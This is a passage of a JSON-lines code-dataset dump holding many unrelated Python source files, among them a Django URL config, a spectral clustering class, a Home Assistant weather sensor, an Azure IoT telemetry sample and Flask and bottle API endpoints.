assert_sw_fw_compatibility(self):\n try:\n assert self.sw_fw_compatible, \\\n 'AFRL/BeagleBone Black software and firmware are not compatible with ' \\\n 'each other'\n except:\n self.close()\n raise\n\n\n def __del__(self):\n self.close()\n\n @Pyro4.expose\n @property\n def owner(self):\n return self._owner\n\n @Pyro4.expose\n @owner.setter\n def owner(self, value):\n self._owner = value\n\n @Pyro4.expose\n def get_version(self):\n \"\"\"return the Arbwave version\"\"\"\n return arbwave_version()\n\n @Pyro4.expose\n def get_objectId(self):\n return self.objectId\n","sub_path":"python/arbwave/backend/drivers/bbb/device/controller/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154099562","text":"import sys\n\nimport cv2\nimport tensorflow as tf\nfrom img_utils.files import images_in_dir\n\nfrom fr.facenet.face import Detection\n\n\ndef main(data_dir, output_dir):\n with tf.Graph().as_default():\n detector = Detection()\n\n image_files = 
images_in_dir(data_dir)\n for im_f in image_files:\n image = cv2.imread(im_f)\n faces, landmarks = detector.find_faces(image)\n print('landmarks: type: {}'.format(type(landmarks)))\n print('landmarks:{}'.format(landmarks))\n for f in faces:\n x1, y1, x2, y2 = f.bounding_box\n cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 2)\n points = landmarks.flatten()\n length = int(len(points) / 2)\n for i in range(length):\n cv2.circle(image, (points[i], points[length + i]), 2, (0, 0, 255), 2)\n cv2.imshow(im_f, image)\n key = cv2.waitKey(0)\n if key == ord('q'):\n cv2.destroyAllWindows()\n elif key == 27:\n break\n\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) < 3:\n print('Usage: python test_alignment.py ${data_dir} ${output_dir}')\n exit(0)\n\n main(args[1], args[2])\n","sub_path":"test/test_mtcnn/test_alignment.py","file_name":"test_alignment.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495800482","text":"from . import views as posts_views\nfrom django.urls import path\nfrom django.contrib.auth.decorators import login_required\n\n\nurlpatterns = [\n\n path('', posts_views.index, name='homepage'),\n\n path('category/', posts_views.show_category, name='category'),\n path('category/new/', posts_views.CategoryCreateView.as_view(), name='category_create'),\n path('category//delete/', posts_views.CateDeleteView.as_view(), name='category_delete'),\n path('category//', posts_views.CateDetailView.as_view(), name='category_detail'),\n\n path('post//', posts_views.PostDetailView.as_view(), name='postdetail'),\n path('post/new/', posts_views.PostCreateView.as_view(), name='postcreate'),\n path('post//update/', posts_views.PostUpdateView.as_view(), name='postupdate'),\n path('post//delete/', posts_views.PostDeleteView.as_view(), name='postdelete'),\n path('mypost/', posts_views.userprofile, name='myposts'),\n\n path('protocols/TPM/', posts_views.protocols_TPM, name='protocols_TPM'),\n path('protocols/FRET/', posts_views.protocols_FRET, name='protocols_FRET'),\n path('protocols/CoSMoS/', posts_views.protocols_CoSMoS, name='protocols_CoSMoS'),\n path('protocols/OT/', posts_views.protocols_OT, name='protocols_OT'),\n\n path('JC/', posts_views.index_JC, name='JC'),\n path('JC/new/', login_required(posts_views.JCForm.as_view()), name='JCcreate'),\n path('JC//', posts_views.JCDetailView.as_view(), name='JCdetail'),\n path('JC//update/', posts_views.JCUpdateView.as_view(), name='JCupdate'),\n path('JC//delete/', posts_views.JCDeleteView.as_view(), name='JCdelete'),\n]","sub_path":"sample/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"398722598","text":"\"\"\"Sandbox util functions.\"\"\"\n\nimport datetime\nimport os\nimport random\n\n\ndef fix_shard_name(shard_name):\n \"\"\"Kubernetes doesn't allow '-' in the beginning or end of attributes.\n\n Instead, replace them with an x.\n\n Example: -80 becomes x80, 80- becomes 80x.\n\n Args:\n shard_name: string, A standard shard name (like -80).\n\n Returns:\n A fixed shard name suitable for kubernetes (string).\n \"\"\"\n if shard_name.startswith('-'):\n return 'x%s' % shard_name[1:]\n if shard_name.endswith('-'):\n return '%sx' % shard_name[:-1]\n return shard_name\n\n\ndef create_log_file(log_dir, filename):\n \"\"\"Create a log file.\n\n This function creates a timestamped log file, and updates a 
non-timestamped\n symlink in the log directory.\n\n Example: For a log called init.INFO, this function will create a log file\n called init.INFO.20170101-120000.100000 and update a symlink\n init.INFO to point to it.\n\n Args:\n log_dir: string, Base path for logs.\n filename: string, The base name of the log file.\n\n Returns:\n The opened file handle.\n \"\"\"\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%H%M%S.%f')\n symlink_name = os.path.join(log_dir, filename)\n timestamped_name = '%s.%s' % (symlink_name, timestamp)\n if os.path.islink(symlink_name):\n os.remove(symlink_name)\n os.symlink(timestamped_name, symlink_name)\n return open(timestamped_name, 'w')\n\n\ndef generate_random_name():\n with open('naming/adjectives.txt', 'r') as f:\n adjectives = [l.strip() for l in f if l.strip()]\n with open('naming/animals.txt', 'r') as f:\n animals = [l.strip() for l in f if l.strip()]\n return '%s%s' % (random.choice(adjectives), random.choice(animals))\n\n","sub_path":"test/cluster/sandbox/sandbox_utils.py","file_name":"sandbox_utils.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"467486863","text":"from django.urls import path, include\nfrom . import views\nfrom rest_framework import routers\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom django.views.decorators.csrf import csrf_exempt\n\nrouter = routers.DefaultRouter()\nrouter.register('donors', views.DonorView)\nrouter.register('users', views.UserView)\nrouter.register('recipients', views.RecipientView)\nrouter.register('stores', views.StoreView)\nrouter.register('purchases', views.PurchaseView)\n\nurlpatterns = [\n\tpath('login/donor/', views.DonorLogin.as_view()),\n path('login/recipient/', views.RecipientLogin.as_view()),\n path('reimburse/', views.Reimburse.as_view()),\n path('scan/', views.ScanPurchase.as_view()),\n path('new-purchase/', csrf_exempt(views.NewPurchase.as_view())),\n path('purchases/', views.GetPurchases.as_view()),\n path('profile/', views.Profile.as_view()),\n path('addcard/', views.AddCard.as_view())\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\nurlpatterns.append(path('', include(router.urls)))\n","sub_path":"donor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"629300846","text":"# october 18th 2016\n# this script characterizes the \n# X years in the life of a \n# recursive DNS server\n# it only considers the query (not the answer)\nfrom __future__ import print_function\n\nimport time\nimport sys\nimport pandas\nimport os\nimport logging\nfrom Epoch_Stats import Epoch_Stats\n\ntry:\n import __builtin__\nexcept ImportError:\n # Python 3\n import builtins as __builtin__\n\n\ndef print(*args, **kwargs):\n \"\"\"My custom print() function.\"\"\"\n # Adding new arguments to the print function signature \n # is probably a bad idea.\n # Instead consider testing if custom argument keywords\n # are present in kwargs\n # __builtin__.print('My overridden print() function!')\n # return __builtin__.print(*args, **kwargs)\n return logging.debug(*args)\n\n\ndef init_program(folder, output_filename):\n # logging.debug('Opening folder: ' + folder)\n print('Opening folder: ' + folder)\n file_name = \"small.txt\"\n file = open(file_name)\n\n dic_epoch = {}\n dic_month = {'Ene':'01','Feb':'02','Mar':'03','Abr':'04','May':'05','Jun':'06',\n 
'Jul':'07','Ago':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}\n for line in file:\n line = line.replace(line.split('-')[1], dic_month[line.split('-')[1]])\n # print(line)\n epoch = int(time.mktime(time.strptime(line.split('client')[0][:-5], '%d-%m-%Y %H:%M:%S'))) - time.timezone\n # print(epoch)\n if epoch not in dic_epoch:\n dic_epoch[epoch] = 1\n else:\n dic_epoch[epoch] += 1\n print(dic_epoch)\n\n x = Epoch_Stats(1)\n #x.to_minutes()\n\n # for file in os.listdir(folder):\n # \ti = 1\n # \tif file.endswith(\".log\"):\n # \t\tpass\n\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n sys.exit('Usage: %s folder output-file' % sys.argv[0])\n\n folder = str(sys.argv[1])\n output_filename = str(sys.argv[2])\n\n logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S', level=logging.DEBUG)\n init_program(folder, output_filename)\n","sub_path":"characteristics.py","file_name":"characteristics.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"558428246","text":"# JOIN\nclass PyAlgorithmInterface():\n\n\talgOptions = {\n\t\t\"ColOrder\" : [],\n\t\t\"XML\" : \"\"\n\t\t}\n\n\t\t\n\tmetaData = {\n\t\t\"Name\" : \"Join\",\n\t\t\"Creator\" : \"Nathan Martindale\",\n\t\t\"Version\" : \"1.0.0\"\n\t\t}\n\n\tdef getMetaData(self):\n\t\treturn self.metaData\n\n\tdef getOptions(self):\n\t\treturn self.algOptions\n\n\tdef setOptions(self, options):\n\t\tself.algOptions = options\n\n\tdef generateRunnableCode(self):\n\t\tcode = \"\"\"\njoiner = JoinOperation.Joiner()\nOUT_DATA = joiner.join(IN_DATA, {VALUE})\n\t\t\"\"\"\n\t\treturn code.format(VALUE=self.algOptions[\"ColOrder\"])\n\n\tdef generateCodeLibraries(self):\n\t\tf = open(\"Join_class.py\")\n\t\tJoinOperationLibrary = f.read()\n\t\tlibraries = { \"JoinOperation\":JoinOperationLibrary };\n\t\treturn libraries\n","sub_path":"Algorithms/algorithm_correct/operation/Join/Join.py","file_name":"Join.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"608182451","text":"import numpy as np\r\nfrom scipy.sparse import csgraph\r\nfrom scipy.sparse import linalg as la\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\n\r\nclass SpectralClustering:\r\n\r\n\tdef __init__(self, graph, k):\r\n\t\tself.graph = graph\r\n\t\tself.k = k\r\n\t\tself.laplacian_matrix = np.zeros(shape=(graph.n, graph.n))\r\n\t\tself.eigenvalues_of_laplacian = np.array(np.zeros(shape=(k, 1)), dtype=int)\r\n\t\tself.eigenvectors_of_laplacian = np.array(np.zeros(shape=(graph.n, k)), dtype=int)\r\n\t\tself.k_first_indices = np.array(np.zeros(shape=(k, 1)), dtype=int)\r\n\t\tself.labels = np.array([])\r\n\r\n\t\t\r\n\tdef compute_laplacian(self):\r\n\t\tself.laplacian_matrix = csgraph.laplacian(self.graph.adjacency_matrix, normed=True)\r\n\t\t\r\n\t\t\r\n\tdef compute_eigenvectors_of_laplacian(self):\r\n\t\tself.eigenvalues_of_laplacian, self.eigenvectors_of_laplacian = la.eigsh(self.laplacian_matrix, k=self.k, sigma=0, which='LM')\r\n\t\tfor i in range(self.graph.n):\r\n\t\t\tself.eigenvectors_of_laplacian[i] = preprocessing.normalize([self.eigenvectors_of_laplacian[i]], norm='l2')\r\n\t\t\r\n\t\t\r\n\tdef compute_clustering(self):\r\n\t\tkmeans = KMeans(n_clusters=self.k).fit(self.eigenvectors_of_laplacian)\r\n\t\tself.labels = kmeans.labels_\r\n\t\treturn kmeans\r\n\t\t\r\n\t\r\n\tdef goodness_of_partition(self):\r\n\t\tcut_edges = 
0\r\n\t\tcommunity_sizes = np.array(np.zeros(shape=(self.k, 1)), dtype=int)\r\n\t\tfor i in range(self.graph.n):\r\n\t\t\tli = self.labels[i]\r\n\t\t\tcommunity_sizes[li] += 1\r\n\t\t\tfor j in range(i, self.graph.n):\r\n\t\t\t\tif self.graph.adjacency_matrix.item(i, j) == 1 and li != self.labels.item(j):\r\n\t\t\t\t\tcut_edges += 1\r\n\t\treturn cut_edges, min(community_sizes), max(community_sizes)\r\n\t\r\n\t\t","sub_path":"src/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"634080138","text":"\"\"\" Various setups\n\"\"\"\nimport json\nimport logging\nfrom zope.component import queryUtility\nfrom eea.app.visualization.zopera import IPropertiesTool\nfrom eea.app.visualization.interfaces import IDavizSettings\nfrom scoreboard.visualization.config import EU, WHITELIST\nlogger = logging.getLogger('scoreboard.visualization')\n\ndef setupVarious(context):\n \"\"\" Custom setup \"\"\"\n\n if context.readDataFile('scoreboard.visualization.txt') is None:\n return\n\n ds = queryUtility(IDavizSettings)\n if not ds.disabled('daviz.properties', 'ScoreboardVisualization'):\n logger.info('Disabling Daviz Properties for ScoreboardVisualization')\n ds.settings.setdefault('forbidden.daviz.properties', [])\n ds.settings['forbidden.daviz.properties'].append(\n 'ScoreboardVisualization')\n\n ptool = queryUtility(IPropertiesTool)\n if not getattr(ptool, 'scoreboard_properties', None):\n ptool.manage_addPropertySheet(\n 'scoreboard_properties', 'Scoreboard Properties')\n\n stool = getattr(ptool, 'scoreboard_properties', None)\n eu = stool.getProperty('EU', None)\n if not eu:\n default = json.dumps(EU, indent=2)\n stool.manage_addProperty('EU', default, 'text')\n\n whitelist = stool.getProperty('WHITELIST', None)\n if not whitelist:\n default = json.dumps(WHITELIST, indent=2)\n stool.manage_addProperty('WHITELIST', default, 'text')\n","sub_path":"scoreboard/visualization/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271743941","text":"# user input\n\"\"\"\nnome = input(\"Digite o seu nome: \")\nidade = int(input(f\"Qual a sua idade {nome}?\"))\n\nnascimento = 2021 - idade\n\nprint(f\"{nome} vc nasceu em {nascimento}\")\n\"\"\"\n### Calculator ###\nn1 = int(input(\"Digite um numero: \"))\nn2 = int(input(\"Digite outro numero: \"))\nres = n1 + n2\n\nprint(f\"O resultado e: {res}\")","sub_path":"005/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"96432980","text":"import math\r\nn = int(input())\r\nnum =math.factorial(n)\r\ncount = 0\r\n\r\nif n <5 :\r\n print(0)\r\nelse :\r\n while True :\r\n num //= 10\r\n count += 1\r\n \r\n if num%10 != 0 :\r\n print(count)\r\n break\r\n\r\n","sub_path":"Algorithm/python/b1676.py","file_name":"b1676.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"357485630","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\nimport os\nimport time\nfrom azure.iot.hub.devicesdk import DeviceClient, Message\nfrom azure.iot.hub.devicesdk.auth.authentication_provider_factory import from_connection_string\nimport uuid\n\n# The connection string for a device should never be stored in code. For the sake of simplicity we're using an environment variable here.\nconn_str = os.getenv(\"IOTHUB_DEVICE_CONNECTION_STRING\")\n# The \"Authentication Provider\" is the object in charge of creating authentication \"tokens\" for the device client.\nauth_provider = from_connection_string(conn_str)\n# For now, the SDK only supports MQTT as a protocol. the client object is used to interact with your Azure IoT hub.\n# It needs an Authentication Provider to secure the communication with the hub, using either tokens or x509 certificates\ndevice_client = DeviceClient.from_authentication_provider(auth_provider, \"mqtt\")\n\n# Connect the client.\ndevice_client.connect()\n\n# send 5 messages with a 1 second pause between each message\nfor i in range(0, 5):\n print(\"sending message #\" + str(i))\n msg = Message(\"test wind speed \" + str(i))\n msg.message_id = uuid.uuid4()\n msg.correlation_id = \"correlation-1234\"\n msg.custom_properties[\"tornado-warning\"] = \"yes\"\n device_client.send_event(msg)\n time.sleep(1)\n\n# send only string messages\nfor i in range(5, 10):\n print(\"sending message #\" + str(i))\n device_client.send_event(\"test payload message \" + str(i))\n time.sleep(1)\n\n\n# finally, disconnect\ndevice_client.disconnect()\n","sub_path":"azure-iot-hub-devicesdk/samples/send_telemetry_device.py","file_name":"send_telemetry_device.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38843300","text":"from django import forms\nfrom .models import Article\n\n\nclass ArticleForm(forms.ModelForm):\n\n class Meta:\n\n model = Article\n\n fields = ('title', 'content',)\n\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control', }),\n 'content': forms.Textarea(attrs={'class': 'form-control', }),\n }\n\n def clean(self):\n\n data = self.cleaned_data\n title = data.get('title')\n qs = Article.objects.filter(title__icontains=title)\n if qs.exists():\n self.add_error('title', f'{title} is already in use')\n return data\n","sub_path":"src/articles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593693025","text":"\"\"\"Support for Meteoclimatic sensor.\"\"\"\nimport logging\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import ATTR_ATTRIBUTION\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom .const import (\n ATTRIBUTION,\n DOMAIN,\n MANUFACTURER,\n MODEL,\n SENSOR_TYPE_CLASS,\n SENSOR_TYPE_ICON,\n SENSOR_TYPE_NAME,\n SENSOR_TYPE_UNIT,\n SENSOR_TYPES,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nasync def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n \"\"\"Set up the Meteoclimatic sensor platform.\"\"\"\n coordinator = hass.data[DOMAIN][entry.entry_id]\n\n async_add_entities(\n 
[MeteoclimaticSensor(sensor_type, coordinator) for sensor_type in SENSOR_TYPES],\n False,\n )\n\n\nclass MeteoclimaticSensor(CoordinatorEntity, SensorEntity):\n \"\"\"Representation of a Meteoclimatic sensor.\"\"\"\n\n def __init__(self, sensor_type: str, coordinator: DataUpdateCoordinator) -> None:\n \"\"\"Initialize the Meteoclimatic sensor.\"\"\"\n super().__init__(coordinator)\n self._type = sensor_type\n station = self.coordinator.data[\"station\"]\n self._attr_device_class = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_CLASS)\n self._attr_icon = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_ICON)\n self._attr_name = (\n f\"{station.name} {SENSOR_TYPES[sensor_type][SENSOR_TYPE_NAME]}\"\n )\n self._attr_unique_id = f\"{station.code}_{sensor_type}\"\n self._attr_unit_of_measurement = SENSOR_TYPES[sensor_type].get(SENSOR_TYPE_UNIT)\n\n @property\n def device_info(self):\n \"\"\"Return the device info.\"\"\"\n return {\n \"identifiers\": {(DOMAIN, self.platform.config_entry.unique_id)},\n \"name\": self.coordinator.name,\n \"manufacturer\": MANUFACTURER,\n \"model\": MODEL,\n \"entry_type\": \"service\",\n }\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return (\n getattr(self.coordinator.data[\"weather\"], self._type)\n if self.coordinator.data\n else None\n )\n\n @property\n def extra_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n return {ATTR_ATTRIBUTION: ATTRIBUTION}\n","sub_path":"homeassistant/components/meteoclimatic/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99180703","text":"class Solution(object):\n def maxSubArray(self, nums):\n dp = [None]*len(nums)\n dp[0] = nums[0]\n m = nums[0]\n for i in range(1, len(nums)):\n n = nums[i]\n dp[i] = (dp[i-1] + n) if dp[i-1] > 0 else n\n print('max ', m)\n print('dp[i] ', dp[i])\n m = max(m, dp[i])\n return m\n\nprint( Solution().maxSubArray( [1,-2,3] ) )\n\n\"\"\"\npublic int maxSubArray(int[] A) {\n int n = A.length;\n int[] dp = new int[n];//dp[i] means the maximum subarray ending with A[i];\n dp[0] = A[0];\n int max = dp[0];\n\n for(int i = 1; i < n; i++){\n dp[i] = A[i] + (dp[i - 1] > 0 ? dp[i - 1] : 0);\n max = Math.max(max, dp[i]);\n }\n\n return max;\n}\n\"\"\"\n\"\"\"class Solution(object):\n m = None\n def helper(self, nums):\n l = len(nums)\n mid = int(l/2)\n print(nums)\n\n if l is 1:\n r = nums[0]\n self.m = max(r, self.m)\n return r\n else:\n r = self.helper(nums[:mid]) + self.helper(nums[mid:])\n self.m = max(r, self.m)\n return r\n\n def maxSubArray(self, nums):\n \"\"\"\"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\"\"\"\n self.m = nums[0]\n self.helper(nums)\n return self.m\n\nprint(Solution().maxSubArray([7, 4,-1,2,1]))\n\"\"\"\n","sub_path":"Python/53_Maximum_Subarray.py","file_name":"53_Maximum_Subarray.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"239970388","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nThis script dir-walks the TTC directory tree recording a md5sum file for files inside TTC courses folder\n'''\nimport codecs, os, sys\n \nfrom . 
import __init__\nfrom sha1classes.XmlSha1HexFileMod import XmlSha1HexFile\n\ndef walk_up_tree(folder_abspath):\n\n sha1counter = 0\n for dirpath, dirnames, filenames in os.walk(folder_abspath):\n print('-'*40)\n print('Walking', dirpath)\n os.chdir(dirpath)\n if len(filenames) == 0:\n continue\n filenames.sort()\n text = ''\n if os.path.isfile('z-sha1sum.txt'):\n f = codecs.open('z-sha1sum.txt','r','utf-8')\n text = f.read()\n f.close()\n for filename in filenames:\n if text.find(filename) > -1:\n continue\n comm = 'sha1sum \"%s\" >> z-sha1sum.txt' %filename\n sha1counter += 1\n print(sha1counter, comm)\n os.system(comm)\n\ndef process():\n ok_to_process = False\n try:\n folder_abspath = os.path.abspath(sys.argv[1])\n if os.path.isdir(folder_abspath):\n ok_to_process = True\n except IndexError:\n pass\n if ok_to_process:\n walk_up_tree(folder_abspath)\n return\n print('Please, give a valid path that will be downwards walked at creating sha1sum-files store folder by folder.')\n\n\nif __name__ == '__main__':\n process()\n #unittest.main()\n","sub_path":"shellclient/generateFlatSha1UpTree.py","file_name":"generateFlatSha1UpTree.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"379384728","text":"from js9 import j\nimport pickle\n\nJSBASE = j.application.jsbase_get_class()\n\n\nclass JS8Stub(JSBASE):\n\n def __init__(self):\n self.__jslocation__ = \"j.tools.js8stub\"\n JSBASE.__init__(self)\n self.loaded = None\n\n def generateStub(self, pickledfile=\"\", dest=\"/tmp/jscompl.py\"):\n with open(pickledfile, \"rb\") as f:\n self.loaded = pickle.load(f)\n with open(dest, \"w\") as f:\n tmpl = \"\"\n i = iter(self.loaded.items())\n c, v = next(i) # first one.\n tmpl += self.generate_class(v, 0)\n tmpl = tmpl.replace(\"\\t\", \" \") # replace tabs with spaces\n f.write(tmpl)\n\n def generate_class(self, info, level): # name, type, doc\n name, t, doc, objpath, filepath, extra = info\n # we got all the subclasses of this one\n # and foreach subclass we generate its template based on indenetation level as well\n generated_fields = self.generate_fields_for(\n objpath, level + 1).rstrip() or \"{spaces}\\tpass\".format(spaces=(level + 1) * \" \")\n tmpl = \"\"\n tmpl += \"\"\"\n{spaces}class {name}:\n{spaces}\\tr'''\n{spaces}{doc}\n{spaces}\\t'''\n{generated_fields}\n \"\"\".format(spaces=level * \" \", doc=doc, name=name, generated_fields=generated_fields)\n\n return tmpl\n\n def generate_fields_for(self, objpath, level=0):\n keys = sorted([k for k in self.loaded.keys() if objpath in k and k.count(\".\") - objpath.count(\".\") == 1])\n vals = [self.loaded[key] for key in keys]\n ret = \"\"\n for val in vals:\n\n if len(val) == 6:\n name, t, doc, objp, filepath, extra = val\n if t in (\"const\"):\n ret += self.generate_field(val, level)\n if t in (\"method\", \"property\"):\n ret += self.generate_method(val, level)\n if t in ('class'):\n ret += self.generate_innerclass(val, level)\n # import pudb; pu.db\n return ret\n\n def generate_innerclass(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n generated_fields = self.generate_fields_for(objpath, level + 1).rstrip() or (level + 1) * \" \" + \"\\tpass\"\n\n tmpl = \"\"\"\n{spaces}class {name}:\n{generated_fields}\n \"\"\".format(spaces=(level) * \" \", name=name, generated_fields=generated_fields)\n return tmpl\n\n def generate_field(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n return \"{spaces}{name} = 
None\\n\".format(spaces=\" \" * level, name=name)\n\n def generate_method(self, info, level):\n name, t, doc, objpath, filepath, extra = info\n if doc is not None:\n doc = doc.replace(\"'\", '\"')\n return \"\"\"\\n\n{spaces}@staticmethod\n{spaces}def {methodname}({methodargs}):\n{spaces}\\tr'''\n{spaces}{doc}\n{spaces}\\t'''\n{spaces}\\tpass\\n\"\"\".format(spaces=(level) * \" \", methodname=name, methodargs=extra or '', doc=doc)\n","sub_path":"JumpScale9Lib/tools/js8stub/JS8Stub.py","file_name":"JS8Stub.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"337760801","text":"'''\nCreated on 01/07/2013\n\n@author: alasarr\n'''\nfrom api import app,auth\nfrom flask import jsonify,make_response,request\n\nfrom model.MPASModel import MPASModel\nfrom collections import OrderedDict\n\n\n@app.route('/mpas', methods = ['GET'])\ndef mpas():\n \n if not request.args:\n return make_response(jsonify( { \"error\": \"No parameters\" } ), 401)\n \n # check if group param exist\n if 'group' not in request.args:\n return make_response(jsonify( { 'error': 'Mandatory group param missing' } ), 400)\n \n # retrieve the order param\n group = request.args['group'] \n if group not in [\"country\", \"nogroup\"]:\n return make_response(jsonify( { 'error': 'Unknown group' } ), 400)\n\n # check lang parameter exist\n if \"language\" not in request.args:\n return make_response(jsonify( { \"error\": \"Mandatory language param missing\" } ), 400) \n \n language = request.args[\"language\"]\n \n # check if it's a valid language \n if language not in app.config[\"languages\"]:\n return make_response(jsonify( { 'error': 'Unknown language' } ), 400) \n \n #lat = request.args[\"lat\"]\n #lng = request.args[\"lng\"]\n #radio = request.args[\"radio\"]\n \n search = request.args.get('search',None)\n \n filter_networks = request.args.get('filter_networks',None)\n filter_networks = [filter_networks] if filter_networks else []\n\n mpas = MPASModel().getMPAS(language,search,filterNetworks=filter_networks)\n \n if group == \"country\":\n # insert mpas into a grouped dictionary \n groupMPAS = OrderedDict()\n for m in mpas:\n if groupMPAS.get(m[\"country\"]) == None:\n #create a list, this taxonomic is not defined \n groupMPAS[m[\"country\"]] = { \"country\" : m[\"country\"] , \"mpas\" : [] } \n \n tmp = { \"id\" : m[\"id_mpa\"].strip() , \"name\" : m[\"name\"] }\n groupMPAS[m[\"country\"]][\"mpas\"].append(tmp)\n \n # liberate memory from mpas list\n del mpas[0:len(mpas)]\n \n response = { \"results\" : groupMPAS.values() }\n \n else:\n #nogroup\n plainMPAS = []\n for m in mpas: \n tmp = { \"id\" : m[\"id_mpa\"].strip() , \"name\" : m[\"name\"] }\n plainMPAS.append(tmp)\n \n # liberate memory from mpas list\n del mpas[0:len(mpas)]\n \n response = { \"results\" : plainMPAS }\n \n return jsonify( response )\n\n@app.route('/mpas/', methods = ['GET'])\ndef get_mpa(id_mpa):\n # check lang parameter exist\n if \"language\" not in request.args:\n return make_response(jsonify( { \"error\": \"Mandatory language param missing\" } ), 400) \n \n language = request.args[\"language\"]\n \n # check if it's a valid language \n if language not in app.config[\"languages\"]:\n return make_response(jsonify( { 'error': 'Unknown language' } ), 400) \n \n mpa = MPASModel().getMPA(id_mpa,language)\n \n response = { \n \"id\" : mpa[\"id_mpa\"],\n \"name\" : mpa[\"name\"],\n \"country\" : mpa[\"country\"], \n \"marine_area\" : round(mpa[\"marine_area\"],1),\n 
\"land_area\" : round(mpa[\"land_area\"],1),\n \"lat\" : mpa[\"lat\"],\n \"lng\" : mpa[\"lng\"]\n }\n \n return jsonify( response )","sub_path":"src/api/mpas.py","file_name":"mpas.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589246938","text":"from bottle import request, response\nfrom bottle import post, get, route\nfrom user.user import User\nfrom connexion.connexion import ConnexionHandler\nfrom shotgun.shotgun import Shotgun\nfrom datetime import datetime\nfrom globals import file_to_json\n\n@get(\"/meta\")\ndef get_meta():\n \"\"\"\n Returns all static data when loading the app\n We don't use authenticate here because wwe don't need to be connected\n Therefore, we are checking if user is connected to get user info if there are\n :return: json meta for static data on app\n \"\"\"\n\n meta = {\n \"user\": {},\n \"shotgun_authorized\": Shotgun.check_time(),\n \"current_date\": datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n \"prices\": {}\n }\n auth = request.headers.get('Authorization')\n user_auth_inst = ConnexionHandler.is_authenticated(token=auth)\n\n response.status = 200\n response.headers['Content-Type'] = 'application/json'\n\n if user_auth_inst is None:\n return meta\n else:\n user = User.build_user_from_login(user_auth_inst[\"login\"])\n info_user = user.get_user_info()\n if info_user:\n meta[\"prices\"] = file_to_json('meta/prices.json')\n meta[\"user\"][\"info\"] = info_user\n meta[\"user\"][\"login\"] = user_auth_inst[\"login\"]\n meta[\"user\"][\"admin\"] = bool(user_auth_inst[\"admin\"])\n meta[\"user\"][\"auth\"] = True\n return 